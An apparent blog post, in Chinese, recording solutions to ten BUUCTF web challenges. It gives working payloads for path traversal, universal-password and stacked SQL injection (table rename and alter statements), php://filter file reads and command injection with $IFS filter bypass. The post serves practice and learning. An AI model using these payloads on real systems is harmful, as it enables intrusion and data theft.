2021-5-5 buu刷题记录
生活所迫,从头捡回来
第一题:
CTF-BUUCTF-[HCTF 2018]WarmUp
php代码审计题
四个if判断 只有最后一个走得通,就是把第二个?进行2次url加密
然后得到%253f
然后构造payload:file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg
这样flag就出来了
第二题:
[极客大挑战 2019]EasySQL
万能密码直接出
第三题
[强网杯 2019]随便注
堆叠注入 很早之前写过的题了
最后就是word
可以显示一串数字
的表不能显示
然后rename
把一串数字的表名改成word
把原本的word
改成其他的,最后1' or 1=1 #
弄出来
1';rename tables `words` to `words1`;
rename tables `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);#
1' or 1=1 #
第四题
[极客大挑战 2019]Havefun
F12 然后?cat=dog
第五题
[SUCTF 2019]EasySQL
没过滤;有个特殊解法*,1
后端代码猜测是:
select $_GET['query'] || flag from flag
第六题:
[ACTF2020 新生赛]Include
Can you find out the flag?
就是那个把flag.php通过base64加密之后输出出来。
?file=php://filter/convert.base64-encode/resource=flag.php
然后去解密就是flag
第七题:
[极客大挑战 2019]Secret File
F12 跳转 抓包 secr3t.php
然后提示在flag.php里面
直接:file=php://filter/convert.base64-encode/resource=flag.php
第八题:
[极客大挑战 2019]LoveSQL
最简单的联合注入了,啥东西都没有
第九题:
[ACTF2020 新生赛]Exec
简单管道符 cat /flag
第十题:
[GXYCTF2019]Ping Ping Ping
?ip=127.0.0.1;cat$IFS$1`ls`
if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");
2021-5-5 buu刷题记录相关推荐
- BUU刷题记录——Misc(一)
文章目录 前言: 1.九连环 2.面具下的flag 3.刷新过的图片 4.snake 5.[BJDCTF 2nd]圣火昭昭 前言: 最近学习之余在BUU上刷了几道misc题,有一些没接触过的知识,挺有 ...
- BUU刷题记录——5
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' uni ...
- [BUU刷题记录]day01-起步
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io contain ...
- BUU刷题记录(四)
以下几题的ciscn是我先抽出来做的,因为不久就是ciscn,所以看看之前的题目,先不按顺序 十七.ciscn_2019_n_3 照例checksec一下 开启了nx和canary,relro只开启部 ...
- BUU刷题记录——6
[De1CTF 2019]Giftbox De1CTF Web WriteUp – 赵 login命令处盲注获取登录密码 登陆后其他可用命令 targeting code position => ...
- buu刷题记录 [PWNHUB 公开赛 2018]傻 fufu 的工作日
[PWNHUB 公开赛 2018]傻 fufu 的工作日 [PWNHUB 公开赛 2018]傻 fufu 的工作日(上传差异绕过) | (guokeya.github.io) /index.php.b ...
- [SWPUCTF] 2021新生赛之Crypto篇刷题记录(11)
[SWPUCTF] 2021新生赛之Crypto篇刷题记录① [SWPUCTF 2021 新生赛]crypto6 [SWPUCTF 2021 新生赛]ez_caesar [SWPUCTF 2021 新 ...
- 蓝桥杯官网刷题记录python
蓝桥杯官网刷题记录python 由于很多题都会在2020.2021.2022年省赛出现,有的在前面文章里做过的这里就不会再说了 一.空间 小蓝准备用 256MB 的内存空间开一个数组,数组的每个元素都 ...
- LeetCode刷题记录15——21. Merge Two Sorted Lists(easy)
LeetCode刷题记录15--21. Merge Two Sorted Lists(easy) 目录 LeetCode刷题记录15--21. Merge Two Sorted Lists(easy) ...
最新文章
- 一个线程罢工的诡异事件
- 一生应该感谢的十种人
- Python基础教程:列表推导式对比For循环执行效率
- Management of your data
- castle windsor学习----- Services and Components 两者的定义
- Python编程及应用--数据分析与科学计算可视化培训班
- android Linkify的用法
- 73.fseek与宽字符读取文件
- outlook邮箱显示一直启动中_[转载]Outlook 2016 显示正在启动... 无法进入Outlook的解决方案...
- 各代iphone尺寸_iphone屏幕尺寸比例是多少,iphone各代屏幕尺寸大小介绍
- 将多个excel合并成一个excel
- 百度地图根据经纬度定位
- 计算机画图虚线,天正建筑怎么把直线变成虚线
- 【CS基础】计组计网
- 短信服务器部署位置,搭建短信服务器
- 【安防监控】如何利用无人机技术严防夏天溺水?
- cpu过载linux杀进程,Linux CPU过载判断以及分析
- 源码资本宣布完成人民币四期38亿新基金募集
- 安徽赛区2022数学建模国赛获奖名单
- Java 偏斜锁 轻量级锁 自环锁 重量级锁